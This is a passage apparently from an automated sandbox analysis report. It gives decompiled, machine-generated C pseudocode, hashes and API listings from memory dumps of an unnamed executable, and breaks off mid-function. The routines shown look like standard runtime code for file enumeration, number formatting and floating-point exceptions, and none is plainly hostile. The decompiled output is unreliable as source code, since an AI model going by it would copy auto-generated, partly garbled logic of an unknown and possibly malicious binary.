                • Instruction Fuzzy Hash: 4F31B175D0122CABCB61DF64D889BDCBBB8AF18710F5046EAE41DA7260E7709F858F44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00CC9FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				intOrPtr* _v32;
                				CHAR* _v36;
                				signed int _v48;
                				char _v286;
                				signed int _v287;
                				struct _WIN32_FIND_DATAA _v332;
                				intOrPtr* _v336;
                				signed int _v340;
                				signed int _v344;
                				intOrPtr _v372;
                				signed int _t35;
                				signed int _t40;
                				signed int _t43;
                				intOrPtr _t45;
                				signed char _t47;
                				intOrPtr* _t55;
                				union _FINDEX_INFO_LEVELS _t57;
                				union _FINDEX_INFO_LEVELS _t58;
                				signed int _t62;
                				signed int _t65;
                				void* _t71;
                				void* _t73;
                				signed int _t74;
                				void* _t77;
                				CHAR* _t78;
                				intOrPtr* _t82;
                				intOrPtr _t84;
                				void* _t86;
                				intOrPtr* _t87;
                				signed int _t91;
                				signed int _t95;
                				void* _t100;
                				intOrPtr _t101;
                				signed int _t104;
                				union _FINDEX_INFO_LEVELS _t105;
                				void* _t110;
                				intOrPtr _t111;
                				void* _t112;
                				signed int _t117;
                				void* _t118;
                				signed int _t119;
                				void* _t120;
                				void* _t121;
                
                				_push(__ecx);
                				_t82 = _a4;
                				_t2 = _t82 + 1; // 0x1
                				_t100 = _t2;
                				do {
                					_t35 =  *_t82;
                					_t82 = _t82 + 1;
                				} while (_t35 != 0);
                				_push(__edi);
                				_t104 = _a12;
                				_t84 = _t82 - _t100 + 1;
                				_v8 = _t84;
                				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
                					_push(__ebx);
                					_push(__esi);
                					_t5 = _t104 + 1; // 0x1
                					_t77 = _t5 + _t84;
                					_t110 = E00CC7B1B(_t84, _t77, 1);
                					_pop(_t86);
                					__eflags = _t104;
                					if(_t104 == 0) {
                						L6:
                						_push(_v8);
                						_t77 = _t77 - _t104;
                						_t40 = E00CCDD71(_t86, _t110 + _t104, _t77, _a4);
                						_t119 = _t118 + 0x10;
                						__eflags = _t40;
                						if(__eflags != 0) {
                							goto L9;
                						} else {
                							_t71 = E00CCA212(_a16, _t100, __eflags, _t110);
                							E00CC7A50(0);
                							_t73 = _t71;
                							goto L8;
                						}
                					} else {
                						_push(_t104);
                						_t74 = E00CCDD71(_t86, _t110, _t77, _a8);
                						_t119 = _t118 + 0x10;
                						__eflags = _t74;
                						if(_t74 != 0) {
                							L9:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E00CC7DBB();
                							asm("int3");
                							_t117 = _t119;
                							_t120 = _t119 - 0x150;
                							_t43 =  *0xcdd668; // 0x814d2927
                							_v48 = _t43 ^ _t117;
                							_t87 = _v32;
                							_push(_t77);
                							_t78 = _v36;
                							_push(_t110);
                							_t111 = _v332.cAlternateFileName;
                							_push(_t104);
                							_v372 = _t111;
                							while(1) {
                								__eflags = _t87 - _t78;
                								if(_t87 == _t78) {
                									break;
                								}
                								_t45 =  *_t87;
                								__eflags = _t45 - 0x2f;
                								if(_t45 != 0x2f) {
                									__eflags = _t45 - 0x5c;
                									if(_t45 != 0x5c) {
                										__eflags = _t45 - 0x3a;
                										if(_t45 != 0x3a) {
                											_t87 = E00CCDDC0(_t78, _t87);
                											continue;
                										}
                									}
                								}
                								break;
                							}
                							_t101 =  *_t87;
                							__eflags = _t101 - 0x3a;
                							if(_t101 != 0x3a) {
                								L19:
                								_t105 = 0;
                								__eflags = _t101 - 0x2f;
                								if(_t101 == 0x2f) {
                									L23:
                									_t47 = 1;
                									__eflags = 1;
                								} else {
                									__eflags = _t101 - 0x5c;
                									if(_t101 == 0x5c) {
                										goto L23;
                									} else {
                										__eflags = _t101 - 0x3a;
                										if(_t101 == 0x3a) {
                											goto L23;
                										} else {
                											_t47 = 0;
                										}
                									}
                								}
                								_t89 = _t87 - _t78 + 1;
                								asm("sbb eax, eax");
                								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                								E00CBE920(_t105,  &_v332, _t105, 0x140);
                								_t121 = _t120 + 0xc;
                								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
                								_t55 = _v336;
                								__eflags = _t112 - 0xffffffff;
                								if(_t112 != 0xffffffff) {
                									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                									__eflags = _t91;
                									_t92 = _t91 >> 2;
                									_v344 = _t91 >> 2;
                									do {
                										__eflags = _v332.cFileName - 0x2e;
                										if(_v332.cFileName != 0x2e) {
                											L36:
                											_push(_t55);
                											_t57 = E00CC9FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
                											_t121 = _t121 + 0x10;
                											__eflags = _t57;
                											if(_t57 != 0) {
                												goto L26;
                											} else {
                												goto L37;
                											}
                										} else {
                											_t92 = _v287;
                											__eflags = _t92;
                											if(_t92 == 0) {
                												goto L37;
                											} else {
                												__eflags = _t92 - 0x2e;
                												if(_t92 != 0x2e) {
                													goto L36;
                												} else {
                													__eflags = _v286;
                													if(_v286 == 0) {
                														goto L37;
                													} else {
                														goto L36;
                													}
                												}
                											}
                										}
                										goto L40;
                										L37:
                										_t62 = FindNextFileA(_t112,  &_v332);
                										__eflags = _t62;
                										_t55 = _v336;
                									} while (_t62 != 0);
                									_t102 =  *_t55;
                									_t95 = _v344;
                									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                									__eflags = _t95 - _t65;
                									if(_t95 != _t65) {
                										E00CC5030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00CC9E2B);
                									}
                								} else {
                									_push(_t55);
                									_t57 = E00CC9FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
                									L26:
                									_t105 = _t57;
                								}
                								__eflags = _t112 - 0xffffffff;
                								if(_t112 != 0xffffffff) {
                									FindClose(_t112);
                								}
                								_t58 = _t105;
                							} else {
                								__eflags = _t87 -  &(_t78[1]);
                								if(_t87 ==  &(_t78[1])) {
                									goto L19;
                								} else {
                									_push(_t111);
                									_t58 = E00CC9FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
                								}
                							}
                							__eflags = _v12 ^ _t117;
                							return E00CBE203(_t58, _v12 ^ _t117);
                						} else {
                							goto L6;
                						}
                					}
                				} else {
                					_t73 = 0xc;
                					L8:
                					return _t73;
                				}
                				L40:
                			}


                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: fe31d395dcd505c1085362a8f8a47995458b295dd442320774cc5a1cbad8d481
                • Instruction ID: cee2e3200db9de3a4afb1a7f53f039d54d1cc13267d7c1a940cef81eb9121193
                • Opcode Fuzzy Hash: fe31d395dcd505c1085362a8f8a47995458b295dd442320774cc5a1cbad8d481
                • Instruction Fuzzy Hash: 6831E47190024DAFCB248E78CC88FFA7BBDDB85358F1402ADF46AD7251E6309E458B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00CCC0B0(signed int* _a4, signed int* _a8) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int* _v80;
                				char _v540;
                				signed int _v544;
                				signed int _t197;
                				signed int _t198;
                				signed int* _t200;
                				signed int _t201;
                				signed int _t204;
                				signed int _t206;
                				signed int _t208;
                				signed int _t209;
                				signed int _t213;
                				signed int _t219;
                				intOrPtr _t225;
                				void* _t228;
                				signed int _t230;
                				signed int _t247;
                				signed int _t250;
                				void* _t253;
                				signed int _t256;
                				signed int* _t262;
                				signed int _t263;
                				signed int _t264;
                				void* _t265;
                				intOrPtr* _t266;
                				signed int _t267;
                				signed int _t269;
                				signed int _t270;
                				signed int _t271;
                				signed int _t272;
                				signed int* _t274;
                				signed int* _t278;
                				signed int _t279;
                				signed int _t280;
                				intOrPtr _t282;
                				void* _t286;
                				signed char _t292;
                				signed int _t295;
                				signed int _t303;
                				signed int _t306;
                				signed int _t307;
                				signed int _t309;
                				signed int _t311;
                				signed int _t313;
                				intOrPtr* _t314;
                				signed int _t318;
                				signed int _t322;
                				signed int* _t328;
                				signed int _t330;
                				signed int _t331;
                				signed int _t333;
                				void* _t334;
                				signed int _t336;
                				signed int _t338;
                				signed int _t341;
                				signed int _t342;
                				signed int* _t344;
                				signed int _t349;
                				signed int _t351;
                				void* _t355;
                				signed int _t359;
                				signed int _t360;
                				signed int _t362;
                				signed int* _t368;
                				signed int* _t369;
                				signed int* _t370;
                				signed int* _t373;
                
                				_t262 = _a4;
                				_t197 =  *_t262;
                				if(_t197 != 0) {
                					_t328 = _a8;
                					_t267 =  *_t328;
                					__eflags = _t267;
                					if(_t267 != 0) {
                						_t3 = _t197 - 1; // -1
                						_t349 = _t3;
                						_t4 = _t267 - 1; // -1
                						_t198 = _t4;
                						_v16 = _t349;
                						__eflags = _t198;
                						if(_t198 != 0) {
                							__eflags = _t198 - _t349;
                							if(_t198 > _t349) {
                								L23:
                								__eflags = 0;
                								return 0;
                							} else {
                								_t46 = _t198 + 1; // 0x0
                								_t306 = _t349 - _t198;
                								_v60 = _t46;
                								_t269 = _t349;
                								__eflags = _t349 - _t306;
                								if(_t349 < _t306) {
                									L21:
                									_t306 = _t306 + 1;
                									__eflags = _t306;
                								} else {
                									_t368 =  &(_t262[_t349 + 1]);
                									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                									__eflags = _t341;
                									while(1) {
                										__eflags =  *_t341 -  *_t368;
                										if( *_t341 !=  *_t368) {
                											break;
                										}
                										_t269 = _t269 - 1;
                										_t341 = _t341 - 4;
                										_t368 = _t368 - 4;
                										__eflags = _t269 - _t306;
                										if(_t269 >= _t306) {
                											continue;
                										} else {
                											goto L21;
                										}
                										goto L22;
                									}
                									_t369 = _a8;
                									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                										goto L21;
                									}
                								}
                								L22:
                								__eflags = _t306;
                								if(__eflags != 0) {
                									_t330 = _v60;
                									_t200 = _a8;
                									_t351 =  *(_t200 + _t330 * 4);
                									_t64 = _t330 * 4; // 0xffffe9e5
                									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                									_v36 = _t201;
                									asm("bsr eax, esi");
                									_v56 = _t351;
                									if(__eflags == 0) {
                										_t270 = 0x20;
                									} else {
                										_t270 = 0x1f - _t201;
                									}
                									_v40 = _t270;
                									_v64 = 0x20 - _t270;
                									__eflags = _t270;
                									if(_t270 != 0) {
                										_t292 = _v40;
                										_v36 = _v36 << _t292;
                										_v56 = _t351 << _t292 | _v36 >> _v64;
                										__eflags = _t330 - 2;
                										if(_t330 > 2) {
                											_t79 = _t330 * 4; // 0xe850ffff
                											_t81 =  &_v36;
                											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                											__eflags =  *_t81;
                										}
                									}
                									_v76 = 0;
                									_t307 = _t306 + 0xffffffff;
                									__eflags = _t307;
                									_v32 = _t307;
                									if(_t307 < 0) {
                										_t331 = 0;
                										__eflags = 0;
                									} else {
                										_t85 =  &(_t262[1]); // 0x4
                										_v20 =  &(_t85[_t307]);
                										_t206 = _t307 + _t330;
                										_t90 = _t262 - 4; // -4
                										_v12 = _t206;
                										_t278 = _t90 + _t206 * 4;
                										_v80 = _t278;
                										do {
                											__eflags = _t206 - _v16;
                											if(_t206 > _v16) {
                												_t207 = 0;
                												__eflags = 0;
                											} else {
                												_t207 = _t278[2];
                											}
                											__eflags = _v40;
                											_t311 = _t278[1];
                											_t279 =  *_t278;
                											_v52 = _t207;
                											_v44 = 0;
                											_v8 = _t207;
                											_v24 = _t279;
                											if(_v40 > 0) {
                												_t318 = _v8;
                												_t336 = _t279 >> _v64;
                												_t230 = E00CBDDA0(_t311, _v40, _t318);
                												_t279 = _v40;
                												_t207 = _t318;
                												_t311 = _t336 | _t230;
                												_t359 = _v24 << _t279;
                												__eflags = _v12 - 3;
                												_v8 = _t318;
                												_v24 = _t359;
                												if(_v12 >= 3) {
                													_t279 = _v64;
                													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                													__eflags = _t360;
                													_t207 = _v8;
                													_v24 = _t360;
                												}
                											}
                											_t208 = E00CD0DE0(_t311, _t207, _v56, 0);
                											_v44 = _t262;
                											_t263 = _t208;
                											_v44 = 0;
                											_t209 = _t311;
                											_v8 = _t263;
                											_v28 = _t209;
                											_t333 = _t279;
                											_v72 = _t263;
                											_v68 = _t209;
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L40:
                												_t264 = _t263 + 1;
                												asm("adc eax, 0xffffffff");
                												_t333 = _t333 + E00CBDDC0(_t264, _t209, _v56, 0);
                												asm("adc esi, edx");
                												_t263 = _t264 | 0xffffffff;
                												_t209 = 0;
                												__eflags = 0;
                												_v44 = 0;
                												_v8 = _t263;
                												_v72 = _t263;
                												_v28 = 0;
                												_v68 = 0;
                											} else {
                												__eflags = _t263 - 0xffffffff;
                												if(_t263 > 0xffffffff) {
                													goto L40;
                												}
                											}
                											__eflags = 0;
                											if(0 <= 0) {
                												if(0 < 0) {
                													goto L44;
                												} else {
                													__eflags = _t333 - 0xffffffff;
                													if(_t333 <= 0xffffffff) {
                														while(1) {
                															L44:
                															_v8 = _v24;
                															_t228 = E00CBDDC0(_v36, 0, _t263, _t209);
                															__eflags = _t311 - _t333;
                															if(__eflags < 0) {
                																break;
                															}
                															if(__eflags > 0) {
                																L47:
                																_t209 = _v28;
                																_t263 = _t263 + 0xffffffff;
                																_v72 = _t263;
                																asm("adc eax, 0xffffffff");
                																_t333 = _t333 + _v56;
                																__eflags = _t333;
                																_v28 = _t209;
                																asm("adc dword [ebp-0x28], 0x0");
                																_v68 = _t209;
                																if(_t333 == 0) {
                																	__eflags = _t333 - 0xffffffff;
                																	if(_t333 <= 0xffffffff) {
                																		continue;
                																	} else {
                																	}
                																}
                															} else {
                																__eflags = _t228 - _v8;
                																if(_t228 <= _v8) {
                																	break;
                																} else {
                																	goto L47;
                																}
                															}
                															L51:
                															_v8 = _t263;
                															goto L52;
                														}
                														_t209 = _v28;
                														goto L51;
                													}
                												}
                											}
                											L52:
                											__eflags = _t209;
                											if(_t209 != 0) {
                												L54:
                												_t280 = _v60;
                												_t334 = 0;
                												_t355 = 0;
                												__eflags = _t280;
                												if(_t280 != 0) {
                													_t266 = _v20;
                													_t219 =  &(_a8[1]);
                													__eflags = _t219;
                													_v24 = _t219;
                													_v16 = _t280;
                													do {
                														_v44 =  *_t219;
                														_t225 =  *_t266;
                														_t286 = _t334 + _v72 * _v44;
                														asm("adc esi, edx");
                														_t334 = _t355;
                														_t355 = 0;
                														__eflags = _t225 - _t286;
                														if(_t225 < _t286) {
                															_t334 = _t334 + 1;
                															asm("adc esi, esi");
                														}
                														 *_t266 = _t225 - _t286;
                														_t266 = _t266 + 4;
                														_t219 = _v24 + 4;
                														_t164 =  &_v16;
                														 *_t164 = _v16 - 1;
                														__eflags =  *_t164;
                														_v24 = _t219;
                													} while ( *_t164 != 0);
                													_t263 = _v8;
                													_t280 = _v60;
                												}
                												__eflags = 0 - _t355;
                												if(__eflags <= 0) {
                													if(__eflags < 0) {
                														L63:
                														__eflags = _t280;
                														if(_t280 != 0) {
                															_t338 = _t280;
                															_t314 = _v20;
                															_t362 =  &(_a8[1]);
                															__eflags = _t362;
                															_t265 = 0;
                															do {
                																_t282 =  *_t314;
                																_t172 = _t362 + 4; // 0xa6a5959
                																_t362 = _t172;
                																_t314 = _t314 + 4;
                																asm("adc eax, eax");
                																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                																asm("adc eax, 0x0");
                																_t265 = 0;
                																_t338 = _t338 - 1;
                																__eflags = _t338;
                															} while (_t338 != 0);
                															_t263 = _v8;
                														}
                														_t263 = _t263 + 0xffffffff;
                														asm("adc dword [ebp-0x18], 0xffffffff");
                													} else {
                														__eflags = _v52 - _t334;
                														if(_v52 < _t334) {
                															goto L63;
                														}
                													}
                												}
                												_t213 = _v12 - 1;
                												__eflags = _t213;
                												_v16 = _t213;
                											} else {
                												__eflags = _t263;
                												if(_t263 != 0) {
                													goto L54;
                												}
                											}
                											_t331 = 0 + _t263;
                											asm("adc esi, 0x0");
                											_v20 = _v20 - 4;
                											_t313 = _v32 - 1;
                											_t262 = _a4;
                											_t278 = _v80 - 4;
                											_t206 = _v12 - 1;
                											_v76 = _t331;
                											_v32 = _t313;
                											_v80 = _t278;
                											_v12 = _t206;
                											__eflags = _t313;
                										} while (_t313 >= 0);
                									}
                									_t309 = _v16 + 1;
                									_t204 = _t309;
                									__eflags = _t204 -  *_t262;
                									if(_t204 <  *_t262) {
                										_t191 = _t204 + 1; // 0xccd6cd
                										_t274 =  &(_t262[_t191]);
                										do {
                											 *_t274 = 0;
                											_t194 =  &(_t274[1]); // 0x91850fc2
                											_t274 = _t194;
                											_t204 = _t204 + 1;
                											__eflags = _t204 -  *_t262;
                										} while (_t204 <  *_t262);
                									}
                									 *_t262 = _t309;
                									__eflags = _t309;
                									if(_t309 != 0) {
                										while(1) {
                											_t271 =  *_t262;
                											__eflags = _t262[_t271];
                											if(_t262[_t271] != 0) {
                												goto L78;
                											}
                											_t272 = _t271 + 0xffffffff;
                											__eflags = _t272;
                											 *_t262 = _t272;
                											if(_t272 != 0) {
                												continue;
                											}
                											goto L78;
                										}
                									}
                									L78:
                									return _t331;
                								} else {
                									goto L23;
                								}
                							}
                						} else {
                							_t6 =  &(_t328[1]); // 0xfc23b5a
                							_t295 =  *_t6;
                							_v44 = _t295;
                							__eflags = _t295 - 1;
                							if(_t295 != 1) {
                								__eflags = _t349;
                								if(_t349 != 0) {
                									_t342 = 0;
                									_v12 = 0;
                									_v8 = 0;
                									_v20 = 0;
                									__eflags = _t349 - 0xffffffff;
                									if(_t349 != 0xffffffff) {
                										_t250 = _v16 + 1;
                										__eflags = _t250;
                										_v32 = _t250;
                										_t373 =  &(_t262[_t349 + 1]);
                										do {
                											_t253 = E00CD0DE0( *_t373, _t342, _t295, 0);
                											_v68 = _t303;
                											_t373 = _t373 - 4;
                											_v20 = _t262;
                											_t342 = _t295;
                											_t303 = 0 + _t253;
                											asm("adc ecx, 0x0");
                											_v12 = _t303;
                											_t34 =  &_v32;
                											 *_t34 = _v32 - 1;
                											__eflags =  *_t34;
                											_v8 = _v12;
                											_t295 = _v44;
                										} while ( *_t34 != 0);
                										_t262 = _a4;
                									}
                									_v544 = 0;
                									_t41 =  &(_t262[1]); // 0x4
                									_t370 = _t41;
                									 *_t262 = 0;
                									E00CCAA64(_t370, 0x1cc,  &_v540, 0);
                									_t247 = _v20;
                									__eflags = 0 - _t247;
                									 *_t370 = _t342;
                									_t262[2] = _t247;
                									asm("sbb ecx, ecx");
                									__eflags =  ~0x00000000;
                									 *_t262 = 0xbadbae;
                									return _v12;
                								} else {
                									_t14 =  &(_t262[1]); // 0x4
                									_t344 = _t14;
                									_v544 = 0;
                									 *_t262 = 0;
                									E00CCAA64(_t344, 0x1cc,  &_v540, 0);
                									_t256 = _t262[1];
                									_t322 = _t256 % _v44;
                									__eflags = 0 - _t322;
                									 *_t344 = _t322;
                									asm("sbb ecx, ecx");
                									__eflags = 0;
                									 *_t262 =  ~0x00000000;
                									return _t256 / _v44;
                								}
                							} else {
                								_t9 =  &(_t262[1]); // 0x4
                								_v544 = _t198;
                								 *_t262 = _t198;
                								E00CCAA64(_t9, 0x1cc,  &_v540, _t198);
                								__eflags = 0;
                								return _t262[1];
                							}
                						}
                					} else {
                						__eflags = 0;
                						return 0;
                					}
                				} else {
                					return _t197;
                				}
                			}
                0x00ccc178
                0x00ccc0fd
                0x00ccc100
                0x00ccc104
                0x00ccc10a
                0x00ccc119
                0x00ccc123
                0x00ccc12b
                0x00ccc12b
                0x00ccc0fb
                0x00ccc0d6
                0x00ccc0d9
                0x00ccc0df
                0x00ccc0df
                0x00ccc0c5
                0x00ccc0cb
                0x00ccc0cb

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CB9D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
                				short _v104;
                				short _v304;
                				short* _t23;
                				int _t24;
                
                				if( *0xcdd610 == 0) {
                					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
                					 *0xcfde30 = _v304;
                					 *0xcfde32 = 0;
                					 *0xcdd610 = 0xcfde30;
                				}
                				E00CAF980(_a4, _a8,  &_v104, 0x32);
                				_t23 = _a12;
                				_t24 = _a16;
                				 *_t23 = 0;
                				GetNumberFormatW(0x400, 0,  &_v104, 0xcdd600, _t23, _t24);
                				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
                				return 0;
                			}








                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CB9DBF
                • GetNumberFormatW.KERNEL32 ref: 00CB9E0E
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00CA6D06(WCHAR* _a4, long _a8) {
                				long _t3;
                				signed int _t5;
                
                				_t3 = GetLastError();
                				if(_t3 == 0) {
                					return 0;
                				}
                				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
                				asm("sbb eax, eax");
                				return  ~( ~_t5);
                			}






                APIs
                • GetLastError.KERNEL32(00CB0DE0,?,00000200), ref: 00CA6D06
                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6D27
                Similarity
                • API ID: ErrorFormatLastMessage
                • String ID:
                • API String ID: 3479602957-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CD0654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                				signed int _t172;
                				signed int _t175;
                				signed int _t178;
                				signed int* _t179;
                				signed int _t195;
                				signed int _t199;
                				signed int _t202;
                				void* _t203;
                				void* _t206;
                				signed int _t209;
                				void* _t210;
                				signed int _t225;
                				unsigned int* _t240;
                				signed char _t242;
                				signed int* _t250;
                				unsigned int* _t256;
                				signed int* _t257;
                				signed char _t259;
                				long _t262;
                				signed int* _t265;
                
                				 *(_a4 + 4) = 0;
                				_t262 = 0xc000000d;
                				 *(_a4 + 8) = 0;
                				 *(_a4 + 0xc) = 0;
                				_t242 = _a12;
                				if((_t242 & 0x00000010) != 0) {
                					_t262 = 0xc000008f;
                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                				}
                				if((_t242 & 0x00000002) != 0) {
                					_t262 = 0xc0000093;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                				}
                				if((_t242 & 0x00000001) != 0) {
                					_t262 = 0xc0000091;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                				}
                				if((_t242 & 0x00000004) != 0) {
                					_t262 = 0xc000008e;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                				}
                				if((_t242 & 0x00000008) != 0) {
                					_t262 = 0xc0000090;
                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                				}
                				_t265 = _a8;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                				_t259 = E00CCDFB6(_a4);
                				if((_t259 & 0x00000001) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                				}
                				if((_t259 & 0x00000004) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                				}
                				if((_t259 & 0x00000008) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                				}
                				if((_t259 & 0x00000010) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                				}
                				if((_t259 & 0x00000020) != 0) {
                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                				}
                				_t172 =  *_t265 & 0x00000c00;
                				if(_t172 == 0) {
                					 *_a4 =  *_a4 & 0xfffffffc;
                				} else {
                					if(_t172 == 0x400) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffd | 1;
                						L26:
                						 *_t257 = _t225;
                						L29:
                						_t175 =  *_t265 & 0x00000300;
                						if(_t175 == 0) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                							L35:
                							 *_t250 = _t178;
                							L36:
                							_t179 = _a4;
                							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                							if(_a28 == 0) {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t254 = _a4;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                								 *(_a4 + 0x50) =  *_t240;
                							} else {
                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                								_t240 = _a24;
                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                								 *(_a4 + 0x50) =  *_t240;
                							}
                							E00CCDF1C(_t254);
                							RaiseException(_t262, 0, 1,  &_a4);
                							_t256 = _a4;
                							if((_t256[2] & 0x00000010) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffe;
                							}
                							if((_t256[2] & 0x00000008) != 0) {
                								 *_t265 =  *_t265 & 0xfffffffb;
                							}
                							if((_t256[2] & 0x00000004) != 0) {
                								 *_t265 =  *_t265 & 0xfffffff7;
                							}
                							if((_t256[2] & 0x00000002) != 0) {
                								 *_t265 =  *_t265 & 0xffffffef;
                							}
                							if((_t256[2] & 0x00000001) != 0) {
                								 *_t265 =  *_t265 & 0xffffffdf;
                							}
                							_t195 =  *_t256 & 0x00000003;
                							if(_t195 == 0) {
                								 *_t265 =  *_t265 & 0xfffff3ff;
                							} else {
                								_t206 = _t195 - 1;
                								if(_t206 == 0) {
                									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                									L55:
                									 *_t265 = _t209;
                									L58:
                									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                									if(_t199 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                										L64:
                										 *_t265 = _t202;
                										L65:
                										if(_a28 == 0) {
                											 *_t240 = _t256[0x14];
                										} else {
                											 *_t240 = _t256[0x14];
                										}
                										return _t202;
                									}
                									_t203 = _t199 - 1;
                									if(_t203 == 0) {
                										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                										goto L64;
                									}
                									_t202 = _t203 - 1;
                									if(_t202 == 0) {
                										 *_t265 =  *_t265 & 0xfffff3ff;
                									}
                									goto L65;
                								}
                								_t210 = _t206 - 1;
                								if(_t210 == 0) {
